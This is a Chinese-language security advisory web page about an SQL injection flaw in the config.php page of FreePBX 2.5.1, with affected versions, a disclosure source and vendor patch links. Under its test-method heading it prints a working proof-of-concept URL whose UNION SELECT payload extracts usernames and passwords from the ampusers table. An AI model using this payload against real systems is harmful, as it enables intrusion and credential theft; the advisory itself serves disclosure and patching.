首 页 |   |   |   |   |   |   |   |   |   |   |   |   |   |  

漏洞通报

漏洞新闻
 
   
FreePBX config.php页面SQL注入漏洞(2010-01-20)
(2010-01-20 09:51:00) 系统管理员

   

发布日期:2010-01-18
更新日期:2010-01-19

受影响系统:

    FreePBX FreePBX 2.5.1

不受影响系统:

    FreePBX FreePBX 2.5.2

描述:BUGTRAQ  ID: 37847

FreePBX之前被称为Asterisk Management Portal,是IP电话工具Asterisk的标准化实现,可提供Web配置界面和其他工具。

FreePBX没有正确地过滤提交给config.php页面的extdisplay参数,远程攻击者可以通过提交恶意的查询请求执行SQL注入攻击。

<*来源:Ivan Huertas
 
  链接:http://marc.info/?l=full-disclosure&m=126385082917779&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://xxx.xxx.xxx.xxx/admin/config.php?display=did&didfilter=&extdisplay=12%22%20union%20select%20username,password,sections,%221%22,%222%22,%223%22,%224%22,%225%22,%226%22,%227%22,%228%22,%229%22,%2210%22,%2211%22,%2212%22%20from%20ampusers%20where%20%22%22=%22

建议:厂商补丁:

FreePBX
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.freepbx.org/trac/changeset/7594
http://www.freepbx.org/trac/changeset/7640
 
联系我们 | 投稿栏 | 意见栏 | 招聘信息 | 站点地图
版权所有©2005 ,中国信息安全测评中心
北京市海淀区上地西路8号院1号楼 Tel:010-82341118 或 010-82341188 Fax:010-82341100
测评服务直拨电话 Tel:010-82341592    E-mail: service@itsec.gov.cn
 
通知:
第三届信息安全漏洞分析与风险评估会议(VARA 2010)